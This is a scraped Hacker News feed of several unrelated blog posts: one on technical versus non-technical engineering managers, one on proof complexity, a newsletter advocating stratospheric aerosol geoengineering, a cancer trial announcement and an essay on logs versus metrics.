    Instead of deep technical knowledge, they're armed with people and project management backgrounds. Non-technical managers come to the table knowing how to navigate corporate politics and stakeholder communications. They must trust their team to excel in their own skills, and that their team in turn trusts them to lead.

    Advantages of a Non-Technical Manager

    • Management focus: Non-technical managers focus on managing their team since they may not have a hand in technical contributions or decisions. This single-sighted aim lends priority to leadership matters, as well as correlating
    • Business communication: Non-technical managers know what they don't know, so they can communicate to other non-technical beneficiaries in simplified ways that a technical person would otherwise have to break down. Non-technical managers may be better equipped at dealing with stakeholders and business partners without needing to complicate with technical details.

    Cons of a Non-Technical Manager

    • Lack of rapport: A non-technical manager may have a longer bridge to build trust with their technical team than a technical manager would. The gaps in their technical knowledge may cause engineers to disregard a non-technical manager's authority. They would need to build rapport and trust with their team in order to best work with them.
    • Translation necessary: A non-technical manager's lack of technical knowledge necessitates translation from engineers. This is an extra step for a team that adds time and potential frustration.

    How to Succeed as a Technical Team Manager - Regardless of Your Background

    The timeless principles of good management can surpass technical experience. Both technical and non-technical managers can work in their strengths and acknowledge their weaknesses. The type of technical background a manager has does not have to define their success.

    Here are the simple ways both types of managers can be great leaders:

    • Know what you don't know: A humble leader earns the trust of their team and partners. Admitting what they don't know opens up discussions on how to harness the team in order to reach goals. Additionally, a lack of knowledge in certain aspects can create space for learning as well as opportunities for delegation.
    • Utilize resources and team: Managers can make up for their weaknesses by delegating appropriately to the right resources and engineers. Assigning tasks such as translating difficult technical aspects for stakeholders to understand can give engineers opportunities for additional skills.

    Regardless of technical experience, managers can still commit the sins of management and lose their team's trust:

    • Micromanaging: Micromanagement reveals a manager's distrust in their team. Engineers can be reluctant to work their full potential with a manager breathing down their neck and critiquing every move. This can be seen in technical managers who nitpick technical details, or non-technical managers who doubt their engineers' knowledge.
    • Communication breaks: Communication is the link that connects people to each other, and essential for teams to work towards shared goals. Poor communication by managers will lead to mistakes, misunderstandings, and inability to get things done in time. Broken down communication also includes a failure to listen to others.

    Conclusion

    Engineers and companies may have a preference to whether their managers have technical backgrounds. There may be no universal answer to which type of manager is best suited for technical teams, as each individual manager will have different strengths and faults.

    A manager can rise above their shortcomings, whether that's in technical or management knowledge, by acknowledging them and focusing on their team's success over their egos.

    ]]>
    https://execefficiency.ai/en/blog/execubot-whos-better-for-engineering-teams-technical-or-non-technical-managers hacker-news-small-sites-43199571 Thu, 27 Feb 2025 23:06:09 GMT
    <![CDATA[What Complexity Theory Can Teach Mathematicians.]]> thread link) | @SeniorMars
    February 27, 2025 | https://seniormars.com/posts/multiple-proofs/ | archive.org

    Motivation

    Every mathematician has, at some point, encountered a new proof of a theorem they already knew was true. Why do we do this? Once a result is proven, it’s settled, right? Well, not quite.

    Mathematics isn’t just about knowing whether something is true—it’s about understanding why it’s true. And as it turns out, different proofs often provide different insights. But what if there’s more? What if there exists an optimal proof—a proof that, in some sense, is the best?

    That’s where complexity theory comes in. And before you say, “But I’m not a computer scientist!”, let’s talk about why you, as a mathematician, should care. I was specifically inspired to make this blog by a thread I saw on Reddit, but I wanted to go into more detail about my thoughts.

    Proofs Are Programs: The Curry-Howard Lens

    One of the most important ideas in mathematical logic is that proofs can be viewed as programs. The Curry-Howard correspondence tells us:

    • A theorem is a type.
    • A proof is a program.
    • Proof normalization is computation.

    From this perspective, every proof we construct is not just a verification of truth—it’s a computational object. And like any computational object, we can ask: how efficient is it?

    For example, if two different proofs of a theorem correspond to two different algorithms, then one might be more efficient than the other. A proof that constructs a witness explicitly (a constructive proof) might yield an algorithm that runs in polynomial time, while a proof relying on non-constructive methods might encode an exponential search.

    And this isn’t just theoretical. Gödel himself saw this connection.

    Gödel, von Neumann, and the Birth of Complexity

    In 1956, Gödel wrote a letter to von Neumann that, in retrospect, essentially anticipated complexity theory before it existed. He asked:

    “One can obviously easily construct a Turing machine, which for every formula F in first order predicate logic and every natural number n, allows one to decide if there is a proof of F of length n. The question is how fast φ(n) grows for an optimal machine.”

    Gödel goes on to speculate about the implications if certain mathematical problems could be solved much more efficiently than by exhaustive search:

    “It would obviously mean that in spite of the undecidability of the Entscheidungsproblem, the mental work of a mathematician concerning Yes-or-No questions could be completely replaced by a machine.”

    Clearly, Gödel was asking something fundamental: Is there a way to measure the complexity of mathematical thought and be able to automate it?

    He was, in essence, formulating what we now recognize as the $\mathcal{P} = \mathcal{N}\mathcal{P}$ problem. If a proof (or algorithm) exists for a problem, how efficiently can we find it? This directly impacts how we think about proofs: If an optimal proof of a theorem exists, how complex is it? How long does it take to verify? Can we systematically find short proofs?

    A Theorem Is an Equivalence Class of Proofs

    If there is one thing, I want you to take away from this blog, it’s this:

    “A theorem is an equivalence class of all its proofs.”

    This is a profound way to think about mathematical truth. A theorem isn’t just a single fact—it’s the collection of all possible ways to derive it. Each proof offers a different perspective, a different computational structure, and sometimes, a different level of efficiency.

    This explains why we care about multiple proofs:

    • They expose new techniques that can be applied elsewhere.
    • They show connections between different areas of mathematics.
    • They reveal computational properties that might not be obvious from a single proof.

    Proof Systems and Axiomatic Differences

    Now, we need to remember proofs don’t exist in isolation—they exist within proof systems, which determine what rules of inference are allowed. Different axiomatic systems can lead to different styles of proofs and even different results.

    In some proof systems, a statement might have an elegant, short proof, while in others, it might require pages of complex derivations. Consider (as expressed by Avi Wigderson in $\mathcal{P}, \mathcal{N}\mathcal{P}$ and mathematics – a computational complexity perspective):

    • Hilbert’s Nullstellensatz: Theorems are inconsistent sets of polynomial equations. Proofs are linear combinations of polynomials.
    • Group theory: Theorems are words that reduce to the identity element. Proofs are sequences of substitutions.
    • Reidemeister moves in knot theory: Theorems are knots that can be unknotted. Proofs are sequences of diagram transformations.
    • von Neumann’s Minimax theorem: Theorems are optimal strategies in zero-sum games. Proofs are arguments showing the strategies are equivalent.

    Each proof system has its own complexity. Some proof systems require exponentially long proofs for certain theorems that are polynomial-length in others. This is one reason why multiple proofs matter—switching proof systems can dramatically affect proof complexity.

    The Pigeonhole Principle and Proof Complexity

    To make this concrete, let’s consider a classic example: the pigeonhole principle.

    The pigeonhole principle states that if you put more pigeons than pigeonholes (say, $ m $ pigeons into $ n $ holes with $ m > n $), then at least one hole must contain multiple pigeons. Trivial, right? But proving this formally can be surprisingly difficult.

    Different proof systems encode this principle differently:

    • Algebraic proof: Using polynomials over $ GF(2) $.
    • Geometric proof: Framing it as an optimization problem.
    • Logical proof: Using Boolean formulas.

    Each of these proof techniques has different proof complexity. For example, in resolution proof systems (used in SAT solvers), the pigeonhole principle requires exponentially long proofs1. But in other systems, it might have polynomial-length proofs. What does this mean? It means that how we choose to prove a theorem can fundamentally affect its computational efficiency.

    This is not just an esoteric fact. It’s a key issue in theoretical computer science: Do short proofs always exist? If $ \mathcal{P} = \mathcal{N}\mathcal{P} $, then very theorem with a short proof has a short proof that we can find efficiently. If $ \mathcal{P} \neq \mathcal{N}\mathcal{P} $, then some theorems may have short proofs that are computationally infeasible to discover.

    Are Some Proofs “Optimal”?

    If every proof corresponds to an algorithm, we can ask whether there exists an optimal proof—the shortest, most efficient proof possible. For some theorems, we suspect there’s an inherent lower bound on proof length. In fact, many results in proof complexity are lower bound arguments: showing that some theorems require long proofs in certain systems.

    For example:

    • The Paris-Harrington theorem, a finitary version of Ramsey’s theorem, cannot be proven in Peano arithmetic despite being a simple combinatorial statement2.
    • The Boolean formula complexity of pigeonhole principles suggests that some tautologies require exponentially long proofs in resolution-based proof systems.

    If we had a general method to find the shortest proof of a theorem, we could answer fundamental questions in complexity theory. But this remains an open problem.

    Constructive vs. Non-Constructive Proofs

    One of the most practical consequences of proof complexity is the difference between constructive and non-constructive proofs.

    • A constructive proof explicitly produces a witness or an algorithm that establishes the truth of the theorem.
    • A non-constructive proof shows that a solution must exist but does not necessarily give a method to find it.

    Why does this distinction matter? Because constructive proofs often translate directly into implementable algorithms. If a proof is constructive, it tells us that something is true and gives us a way to compute it. In contrast, a non-constructive proof might establish existence without providing an efficient method of finding a solution.

    For example, the Four Color Theorem was initially proven using a brute-force computer-assisted proof, verifying many cases without providing a human-comprehensible reason for why it holds. In contrast, many number-theoretic theorems have constructive proofs that immediately yield algorithms.

    This distinction ties directly into complexity theory: If a problem is in $\mathcal{N}\mathcal{P}$ , then we can verify solutions quickly—but can we find them efficiently? The existence of a solution does not imply that it can be computed in polynomial time.

    The Computational Future of Proofs

    Modern developments in automated theorem proving and interactive proof assistants are pushing mathematics toward a more computational paradigm. Proof assistants like Lean, Coq, and Isabelle formalize mathematical arguments as computational objects. And increasingly, mathematicians are using them.

    Why should this matter? Because if proof search is a computational problem, then questions about proof efficiency become questions about algorithm design.

    Mathematical proof isn’t just about verification—it’s about complexity. The length, structure, and computational cost of proofs aren’t just theoretical curiosities; they reflect fundamental limits of reasoning itself. And in an era where AI-assisted theorem proving is becoming practical, understanding proof complexity isn’t just a curiosity—it’s a necessity.

    Conclusion

    So, why do we seek multiple proofs of the same theorem? Not just for elegance. Not just for insight. But because proof complexity is real.

    Mathematicians should care about proof complexity because:

    1. Proofs encode computation, and different proofs reveal different computational efficiencies.
    2. Gödel’s insight suggests that understanding proof complexity could help measure mathematical reasoning itself.
    3. If $ \mathcal{P} \neq \mathcal{N}\mathcal{P} $, then some theorems have short proofs we can’t efficiently find—implying fundamental limits on mathematical knowledge.

    So next time you see a new proof of a theorem, think of it not just as another way to see the truth—but as a different computational path, a different algorithm, and maybe, just maybe, a step toward an optimal proof.

    And if someone ever does prove $ \mathcal{P} = \mathcal{N}\mathcal{P} $, well… we might just be able to automate all of mathematics.

    ]]>
    https://seniormars.com/posts/multiple-proofs/ hacker-news-small-sites-43199463 Thu, 27 Feb 2025 22:52:26 GMT
    <![CDATA[No one is coming to save us. Time to cowboy up]]> thread link) | @andyjsong
    February 27, 2025 | https://www.keepcool.co/p/no-one-is-coming-to-save-us-time-to-cowboy-up | archive.org

    Hi there,

    Today's Keep Cool edition was written by Andrew Song, the co-founder of Make Sunsets. Increasingly, I will occasionally turn these pages to others to collaborate with me or publish their own ‘op-eds’ (which I think is a worn-out term; “op-eds” can be highly analytical and rigorous). I only offered light edits and some resources + data additions.

    Five more editors notes (feel free to skip straight to the Deep Dive as desired):

    • There are dead players and live players (credit to Samo Burja for conceiving of this heuristic) in any field. That’s especially relevant right now, as we’re in the midst of radical change across industries, social norms, planetary climate systems, geopolitics, and whatever else may come to mind for you.

    • Per the coiner of the concept, Samo: “A live player is a person or well-coordinated group of people that is able to do things they have not done before. A dead player is a person or group of people that is working off a script, incapable of doing new things.” In my words? Dead players are stuck in old paradigms. They’re incapable (at least, absent evolution) of adapting to new paradigms, of shifting entrenched, engrained behaviors and how they see and operate in the world. Side note on a past political example offered at the end of this newsletter.**

    • Live players, meanwhile, are, at the minimum, willing to test and tinker, often well outside the norms of past paradigms, in service of finding new models, practices, ideas, and strategies that can actually shake things up (ideally positively vs., say, in service of accelerating extraction and the consolidation of power and wealth).

    • Re: this newsletter takeover, I (Nick) am not some Make Sunsets groupie. If nothing else, I think a) geoengineering is firmly in the “climate” zeitgeist now and isn’t going anywhere (I’ll give myself some credit here, having discussed it since 2023), and b) Make Sunsets is a “live player.” The field of ‘climate’ work is—from my vantage point—littered with dead players (including myself to an extent!). I’m talking about organizations, companies, corporate and national ‘commitments,’ communication frameworks, and lifelong institutionalists and rule followers who try and have tried mighty hard but haven’t bent the overarching curve of warming, global emissions, or global decarbonization for 30+ years now (see chart below for visual evidence to that point). Sorry to say it! & I’m guilty, too.

    • Hence, we should pay attention to the live players, especially as live players in other fields (*cough cough,* the new U.S. Federal admin, go “shock and awe” mode while the dead players (geriatric politicians, crumbling legacy media, etc…) throw up their hands and say, “This is unprecedented! You can’t do that!”) As bad as some, if not most, of what’s happening politically in the U.S. is, in my opinion, it illustrates the power of what live players can accomplish in short order. So… the invitation is to all work on becoming ‘live players’ in service of good ends.

    Decarbonizing, as measured by CO2 vs. PPP, has not accelerated meaningfully since 1990 (at least) — and that’s despite $2 trillion in decarbonization spending globally in 2024

    Final note: Make Sunsets is paying me nothing to publish this. I’m not here to push their approach or their project. I’m here to push the conversation. Lots of folks don't like their approach. That's cool, welcome in fact! That's what we need more of, at minimum in addition to the ‘kumbaya’ renewables-only boosting, doom & gloom, policy-focused, and utility, insurance, and oil & gas company-blaming comms approach. / end rant

    The newsletter in 50 words: We geoengineer every day and have for millennia. Ever since humans harnessed fire and animal husbandry (especially for methane-belching cows, goats, and sheep), that's been true. The challenge? 99.99% of our current geoengineering destabilizes Earth's climate systems. What might it look like to get strategic about doing geoengineering in 'reverse?'

    Nick

    DEEP DIVE — TIME TO ENGINEER A MORE STABLE CLIMATE

    The world has sustained 1.5°C of warming above pre-industrial levels for over a year now. There’s no sign that trend will change anytime soon. Put plainly: We’ve run out of time to ‘do’ decarbonization without additional help to cool the planet now and buy time.

    Despite a cold winter in North America, January 2025 set another startling heat record globally.

    The Paris Agreement—with its lofty goals of keeping warming “well below 2°C”—is starting to look more like a polite diplomatic exercise than a genuine rescue plan. Despite pledges and targets, the energy transition simply isn’t happening fast enough. 82% of global primary energy is still fueled by oil, gas, or coal, and that number has only fallen marginally in recent decades.

    Yes, I know primary energy is an imperfect measure for the energy transition. But it does over a perspective on how, globally, the energy transition is moving quite slowly (Nick note)

    Why CO₂ removal alone won’t save us

    Many have pinned their hopes on dramatic emissions reductions across sectors (mind you, emissions of most if not all major greenhouse gasses globally remain at all-time highs) coupled with carbon dioxide removal (CDR): Capturing CO₂ from the air. The hard truth is that that approach is too expensive and too slow to cool the planet in time.

    • $330/ton: The average retail price for removing 1 ton of CO₂ through today’s carbon removal projects. Note that many of these companies are likely charging less for removal than their hard costs!

    • $3.58 billion: Spent so far on CO₂ removal, according to CDR.fyi.

    • 13.2 million tons of CO₂ have been sold, but only 4.5% of that has actually been delivered. Even if all of it were delivered, it would offset less than Nepal's annual CO2 emissions (not a big or emissions-intensive country, mind you, and again, that’d just be for one year!).

    • Meanwhile, we pumped out over 37 billion tons of CO₂ in 2023 and have accumulated a debt of over 1 trillion tons of CO₂ since the industrial revolution—orders of magnitude more than we’re sucked up.

    For most companies, trying to offset all of their emissions at $330/ton would be a fast track to bankruptcy. Even the target price of $100/ton of CO2 removed would cripple most major companies. As a result, the advanced market commitment that was supposed to turbocharge the voluntary carbon market hasn’t come close to bridging this gargantuan gap, at least not yet. We wish them luck!

    Bottom line: Today’s CO₂ removal industry will not meaningfully change global temperatures before 2100, and we shouldn’t put all our eggs into one basket. Could carbon removal scale? Sure. But public (and frankly, also private) sector commitment and will to accelerate that effort is nowhere near where it was even two to three years ago. Should people working conscientiously on scaling carbon removal stop? Hardly. But we’ll benefit from more toolkits in our toolbox, especially ones that would slow warming much more quickly than carbon removal can.

     † Aggregate price index of 1 ton of CO₂ removal sold on CDR.fyi as of December 2024

    We already geoengineer—we just do it poorly

    Humanity has been unintentionally geoengineering Earth for centuries. Greenhouse gases (GHGs) warm our planet, while sulfur aerosols cool it. Emissions from coal, shipping, and heavy industry have spewed sulfur dioxide (SO₂) into the lower atmosphere (troposphere), creating reflective particles that mitigate some CO₂-driven warming—albeit with severe side effects, including acid rain and others that are harmful to human and planetary health.

    SO emissions already peaked in 1979:

    134.6 million tons of SO₂ were emitted into the air in 1979

    By 2022, we’ve cut SO₂ emissions by 48.5%:

    We’re now down to down to 69.31 million tons of SO2, something almost no one talks about.

    The unraveling of our “messy sunscreen”

    As governments cracked down on acid rain in the 1980s and 1990s via policies like the Clean Air Act, SO₂ emissions dropped. More recently, the International Maritime Organization forced ships to reduce emissions of SO₂ by scrubbing out the proverbial “sunscreen” from shipping emissions (IMO2020). While that’s welcome news for forests and your lungs, to which SO2 can be harmful, it also inadvertently reduced the reflection of solar energy significantly, yielding even more net global warming.

    See more of this type of analysis from Zeke Hausfather here

    As pollution controls kicked in, we ironically reduced this unintentional “cooling shield.” According to climate scientist Zeke Hausfather, if it weren’t for aerosols originating from human activity, we could be close to 2°C of warming already. Slashing SO2 emissions to protect ecosystems and human health has allowed more CO₂ warming to “shine” through.

    For centuries, we have used SO2 to cool the planet, but we have done so haphazardly and inefficiently. Stratospheric aerosol injection (SAI) proposes doing it cleanly and strategically, focusing especially on getting the SO2 into the stratosphere for longer-lasting, more controlled results.

    The Pinatubo clue: Location & quantity are key levers

    In 1991, Mount Pinatubo in the Philippines erupted, injecting ~20 million tons of SO₂ into the stratosphere, ~20 km (~12.5 miles) above the Earth’s surface. The result? A 0.5°C drop in global temperatures for roughly a year.

    Economist (2023). “Solar geoengineering is becoming a respectable idea”

    This reveals a critical truth: Location—specifically, height and quantity of SO₂ injections—matter enormously. A fraction of sulfur in the stratosphere can achieve the same cooling as far larger amounts of SO2 closer to ground level.

    1:1,000,000 leverage

    With carbon removal, you remove 1 ton of CO₂ to counteract 1 ton of CO₂ emitted—a 1:1 ratio. It’s necessary in the long run, but it’s expensive and slow-moving.

    No, it’s not “permanent” in the way that avoiding the emission of carbon dioxide—which lingers in the atmosphere for hundreds of years—or carbon removal with long-term sequestration is. But carbon removal has its own durability and permanence issues; SAI is higher leverage and cheap, thus lending itself to iterative application, as needed, offering humanity more time to decarbonize (which will take many more decades).

    How we started + where we’re going

    Make Sunsets was born from the realization that we’re already geoengineering—just badly. We figured, let’s do it more carefully, ethically, and under public scrutiny.

    Here’s our journey so far:

    • First Micro-Launches: We began by releasing just 1 gram of SO₂ in Nevada, testing balloon delivery, and measuring data.

    • Current Deployments: We deploy around 1,500 grams of SO₂ at a time. This is still a blip on a microscope compared to continuing SO2 emissions globally. Still, it’s enough to demonstrate feasibility while complying with US regulations and raising awareness by engaging with various media outlets. Want to see how it works? Watch here.

    • Scaling Plans: With demand, we can scale up to 1,000 kg (1 ton) of SO₂ per balloon. That single launch could offset the warming effect of 1 million tons of CO₂ for a year. Extend the logic further, and 37,000 of these balloons could pause warming for 1 year. Scale would also help us reduce costs as we can buy sulfur at cheaper market prices ($100 to $200 per ton) if we buy in bulk.

    • Radical Transparency: From cost breakdowns to financial health, we share everything monthly on our blog and FAQ. We’re not hiring PR firms that forgot to tell the mayor of the city that they’re spraying chemicals off a death machine or secret launches using "proprietary particles.” 

    We’ve built a passionate community: 840+ customers—including atmospheric scientists, climate researchers, engineers, teachers, doctors, lawyers, accountants, a co-owner of an NFL team, billionaires, VCs, students, founders, and "climate dads"—have purchased Cooling Credits, offsetting the warming of 123,808 tons of CO₂ for a year.

    Sure, that’s a drop in the ocean compared to total emissions. But it’s a real, measurable start—something no government, university research group, or corporation has done in SAI at this scale. And, let’s be real—while many CDR companies have raised hundreds of millions, we’re just two guys with under $2M in VC funding—yet in 2024, we delivered more cooling than any CDR company in the world.

    The Economic Case: Yes, SAI is like sunscreen—it requires reapplication.

    But, comparing costs:

    • SAI: $1 per ton-year—renewed annually until CO₂ exits the atmosphere.

    • CDR: $330+ per ton upfront—to remove a single ton permanently.

    Cost & permanence: SAI vs. carbon removal methods

    Despite the hype around carbon removal, permanent CO₂ capture remains expensive and slow-moving. Below is a short comparison of common CDR pathways alongside SAI:

    *Costs vary widely by project scale, location, and technology maturity.

    How can SAI be so cheap?

    1. Fast & Scalable: We don’t need massive plants that consume vast amounts of energy or complex pipelines. We just need balloons (and eventually planes), people (come volunteer if you like!), and capital to deploy aerosols.

    2. Bulk Sulfur Prices: Once you’re purchasing sulfur in tonnage at market rates ($100–$200/metric ton), the per-ton-year offset cost can drop well below $1. One ton of SO2 in the stratosphere can offset the warming of 1 million tons of CO2 for a year.

    3. Small Injection, Big Effect: Releasing a tiny amount of sulfur in the stratosphere yields significantly more cooling benefit than larger amounts deployed near ground level.

    SAI’s “catch”: Again, it’s like sunscreen. You have to keep doing it. If you stop injecting aerosols, the cooling effect fades over a couple of years, unlike permanent CO₂ removal options that lock carbon away for decades to millennia. Plus, there are many other potential externalities to evaluate → read on for more on that two sections down.

    Measuring our progress: Present to future

    Near-Term:

    • Weather Balloons: This is our current method to deliver SO₂ to stratospheric altitudes cost-effectively. Again, you can see it work in action here:

    Long-Term:

    • Aircraft Deployments: Once we’ve maxed out on balloons, we can use larger planes that can reach the stratosphere to inject bigger loads of SO₂ more efficiently and in precise locations.

    • Satellite Validation: As we scale, agencies like NOAA can measure aerosol distribution from space, using the same satellites that measure the cooling effect of stratovolcanic eruptions.

    • Refined Models: With real-world data, we’ll help hone climate models, track just how big or small SAI’s effect can be under different conditions, and get off the modeling treadmill with better and better data.

    It’s all tradeoffs, all the way down

    Injecting sulfate aerosol into the stratosphere will cool the planet, reducing mortality from heat, one of the leading risks of climate change. Sulfate aerosol air pollution is a leading cause of environmental mortality worldwide, so it is one of the most obvious risks of sulfate aerosol geoengineering. Sulfate aerosols in the stratosphere can also damage the ozone layer, causing an increase in mortality from skin cancers.

    David Keith and Anthony Harding

    All “climate” solutions come with tradeoffs all the way down. Here’s more on SAI’s “harm-to-benefit” ratio from the above authors, with links to more sources.

    So, what do we do now?

    1. Acknowledge We’re Already Geoengineering: The history of societal progress has been and is predicted on burning things, whether wood, dung, or fossil fuels. That releases CO2: Every day, we geoengineer. How we geoengineer today just happens to predominantly destabilize Earth’s climate system rather than stabilizing it or not impacting it drastically. There’s no going back to “pristine” quickly. But we can put on sunscreen. Or at least figure out how to make the sunscreen work at scale in case we need it at a later date. Plus, we may well discover other ancillary applications from the R&D along the way.

    2. Take SAI Seriously. In addition to reducing emissions, SAI is perhaps the only proven approach that could scale quickly and drive immediate cooling.

    3. Keep Investing in CO₂ Removal & Global Decarbonization, and other R&D: SAI might provide relief now. But, again, none of this is to say we won’t also need to remove the CO₂ from the atmosphere, develop atmospheric methane removal, and, most importantly, do the deep emissions reductions work globally (absent which, little else matters). It’s always and, and, and, ad infinitum.

    From surpassing 1.5°C to the slow grind of global decarbonization or scaling up carbon removal, the current “climate” paradigm isn’t enough. Stratospheric aerosol injection offers a 1:1,000,000 leverage option, as one gram of SO₂ successfully deployed in the stratosphere offsets the warming of 1 ton of CO₂ for one year (at least). That’s not a get-out-of-jail-free card; it’s a bridge to buy time.

    To recap, here’s why it’s worth placing SAI in the ‘climate’ mitigation toolbox:

    • Near-Term “Bridge”: SAI can rapidly reduce warming now, buying time for global emission reduction efforts across industries and carbon removal (and other geoengineering) breakthroughs to catch up.

    • Not a Substitute for Decarbonization: Because SAI doesn’t remove carbon, we still need to reduce emissions and invest in more durable CO₂ removal (and evaluate other early-stage GHG removal or ‘destruction’ methods).

    • Inexpensive & Immediate: For any entity priced out by $300–$600/ton removal, SAI, at under $1/ ton-year, offers a compelling way to prevent additional near-term warming without waiting on game-changing tech or bankrupting budgets.

    At the bare minimum, we should keep advancing this as a wrench in our holistic climate system restabilization toolkit. That’s why we make the noise. Even if we make enemies, moving the geoengineering conversation along alone is worth it. As Nick wrote recently:

    In many fields of endeavor, if you aren't making enemies, you're not pushing on sufficiently salient questions. You’re not on the “knife’s edge.”

    Nick

    As we proceed, we’ll continue to try to prove that we can genuinely impact the global thermostat in a measurable, relatively safe fashion. Join us for the next balloon launch and check out lots more content on our web (or Nick’s past writing: See here and here, for instance). Plus, we can always share many more resources for more learning).

    Feedback? Pushback (desired!)? Comments? Respond and I’ll share with Andrew & co.

    — Nick

    More references & data sources

    ** Addendum on dead vs. live players from Nick’s intro: Dead, or at least only “half live” players, are kinda like Obama, who, after campaigning on his ability to be the real deal live player-wise and winning a dual House and Congressional mandate, surrounded himself with dead players—i.e., institutionalists, like Larry Summers. Thus, his admin achieved far less than it could have in the way of real reform, especially in banking. I say this as a quite liberal person overall, and a fan of Obama’s in general.

    ]]>
    https://www.keepcool.co/p/no-one-is-coming-to-save-us-time-to-cowboy-up hacker-news-small-sites-43199437 Thu, 27 Feb 2025 22:49:11 GMT
    <![CDATA[World-first experimental cancer treatment paves way for clinical trial]]> thread link) | @femto
    February 27, 2025 | https://www.wehi.edu.au/news/world-first-experimental-cancer-treatment-paves-way-for-clinical-trial/ | archive.org

    An Australian-led international clinical trial will scientifically investigate the efficacy of the approach within a large cohort of eligible glioblastoma patients and could commence within a year.

    The study will trial the use of double immunotherapy. In some patients, double immunotherapy will be combined with chemotherapy.

    The trial will be led by The Brain Cancer Centre, which has world-leading expertise in glioblastoma.

    “I am delighted to be handing the baton to Dr Jim Whittle, a leading Australian neuro-oncologist at Peter MacCallum Cancer Centre, The Royal Melbourne Hospital and Co-Head of Research Strategy at The Brain Cancer Centre, to commence a broader scientific study to scientifically determine if – and how – this process might work in treating glioblastoma,” said Prof Long, who also secured drug access for the clinical trial.

    “While we are buoyed by the results of this experimental treatment so far, a clinical trial in a large group of patients would need to happen before anyone could consider it a possible breakthrough.”

    Dr Whittle, also a laboratory head at WEHI, said: “We are pleased to be able to build on this exciting work by diving into the process of designing a clinical trial, which takes time, care and accuracy.

    “When that process is complete, the result will be a world first clinical trial that enables us to thoroughly test the hypothesis against a representative sample of patients.”

    The Brain Cancer Centre was founded by Carrie’s Beanies 4 Brain Cancer and established in partnership with WEHI with support from the Victorian Government.

    The centre brings together a growing network of world-leading oncologists, immunologists, neurosurgeons, bioinformaticians and cancer biologists.

    Commencement of recruitment for the clinical trial will be announced by The Brain Cancer Centre at a later date and will be limited to eligible patients.

    ]]>
    https://www.wehi.edu.au/news/world-first-experimental-cancer-treatment-paves-way-for-clinical-trial/ hacker-news-small-sites-43199210 Thu, 27 Feb 2025 22:24:22 GMT
    <![CDATA[Show HN: SDL-Ball Ported for the Web]]> thread link) | @dusted
    February 27, 2025 | https://midzer.de/wasm/sdl-ball/ | archive.org

    Unable to extract article]]>
    https://midzer.de/wasm/sdl-ball/ hacker-news-small-sites-43199148 Thu, 27 Feb 2025 22:17:16 GMT
    <![CDATA[Logs Matter More Than Metrics]]> thread link) | @mathewpregasen
    February 27, 2025 | https://www.hyperdx.io/blog/logs-matter-more-than-metrics | archive.org

    Disclosure: I run an observability company, so this post is subject to some (heavy) bias. However, it also underscores why I wanted to work on HyperDX.

    Metrics matter. Logs matter more.

    But that’s not how most developers see it. Developers love metrics. It’s something that they put care and attention into. Developers call meetings to figure out how to implement and interpret metrics. They are readily shown to new hires—colorful dashboards with sprawling statistics measuring CPU, memory, and network health. Once, when demoing my product, I was told by a engineering director, “This is cool, but where are the fancy charts?”

    Logs get none of that hype. They are the ugly stepchild of observability. They get implemented, but with the attitude that you’d treat a necessary evil. They don’t get meetings dedicated to them. They’re never flaunted to new hires. They just exist, quietly recording events in the background.

    Here’s the irony: while metrics might have the aesthetic of a complex system, logs are more useful 80% of the time. When an incorrect behavior emerges, logs are more likely to explain what happened than any metrics. Logs—particularly logs with high cardinality—provide a detailed recollection. They feature no dimension reduction. And metrics, by definition, do. They are just a crude read of a bug’s effect on an application.

    Not All Logs Are Created Equal

    The importance of logs is partially diminished because they are poorly implemented in many organizations. The difference between a good log and a great log is striking.

    Great logs are those with attributes that can tie an event to the source of the issue (e.g. a user_id, payment, host, etc.). This is often framed as logs with high cardinality. High cardinality means that the log includes multiple fields containing unique values. For example, a front-end logged event might include a session ID, a request ID, a user ID, an organization ID, a payment ID, a timestamp, and a network trace. High cardinality like this is a heuristic for a log actually being useful in the case of an error.

    Tricky Bugs Where Logs Are the Saving Grace

    I have two contrasting examples that illustrate the value of logs.

    The Socket Timeout

    A while ago, we had a weird issue with sockets—customers reported certain queries would unpredictably time-out. On our dashboard, there were no reports of failed ClickHouse queries—however, customers failed to get data that originated in ClickHouse. Looking through our traces associated with those specific customers and timestamps, we discovered the error: The ClickHouse query succeeded, but the load balancer’s socket timed out before ClickHouse could reply. This was obvious by comparing the timestamps of the socket and the ClickHouse response, as well as observing the corresponding error returned within our API.

    Using the logs, we were able to correlate the types of requests that would lead to the same behavior. Additionally, on the ClickHouse side, we could determine what query properties caused sluggish performance. These details are all things untraceable to a spurious failure metric.

    Glofox Fake “DDoS”

    Pierre Vincent has a fantastic developer talk (opens in a new tab) at InfoQ’s Dev Summit (opens in a new tab) where he discusses logs versus metrics. Pierre works at Glofox (opens in a new tab), a gym management software company. A few years ago, they experienced an incident that highlighted how metrics could be misleading in the absence of great logs.

    Because Glofox creates gym software, the pandemic significantly impacted their product’s usage. Gyms suddenly closed (and subsequently opened) on government orders. On one of these reopening dates, Glofox experienced a massive surge in requests, which lit up metrics.

    Through metrics, Glofox appeared to be suffering from a DDoS attack originating in Singapore. The easy remedy would be blocking all the IPs dispatching thousands of requests. Singapore was also reopening gyms that day, and Pierre suspected the incident wasn’t actually an attack. But it also wasn’t just returning users; the requests were overwhelming.

    By diving through logs, Glofox’s engineering team nailed the culprit: Glofox’s front-end had a bug where lengthy sessions would dispatch more and more requests due to an unintentional JS loop. Many of Glofox’s Singaporean customers had been shut down for months but had minimized tabs. By reopening these tabs, Glofox’s back end was inundated by months of quarantined requests, which imitated a DDoS attack.

    Only because of logs was Glofox able to diagnose the problem and devise a quick remedy that enabled their application to persist on one of the most important days of the year.

    Developer Religions

    I’ll admit this debate hinges on some concept of developer religions—the idea that developers, myself included, have strong beliefs because of some hypothetical ideal. Some developers swear by the importance of metrics; I care more about capturing high cardinality data through logs.

    But to be clear, it is ridiculous to believe one should exist at the demise of the other. It’s more a matter of foundations. In my worldview, high cardinality should be the north star for building a good observability stack; metrics should follow.

    Funnily enough, I hold the opposite belief regarding our marketing strategy. For marketing, I care more about metrics than individual stories. That’s because marketing is an optimizing outcomes problem—strategies succeed or fail on the basis on an aggregate. That mindset doesn’t hold when it comes to development, where the goal is to eliminate issues that any user is facing.

    A Closing Thought

    Logs matter. They matter in the same vein that testing matters, CI/CD matters, security matters. Without good logs, errors turn from nuisances to headaches. So next time that your team brings up the importance of metrics, push aside the hype of fancy charts to spend time improving your logs. Of course, you can take my opinion with a grain of salt—I run a observability company that’s built on good logs—but there’s a reason that I ended up in this space.

    ]]>
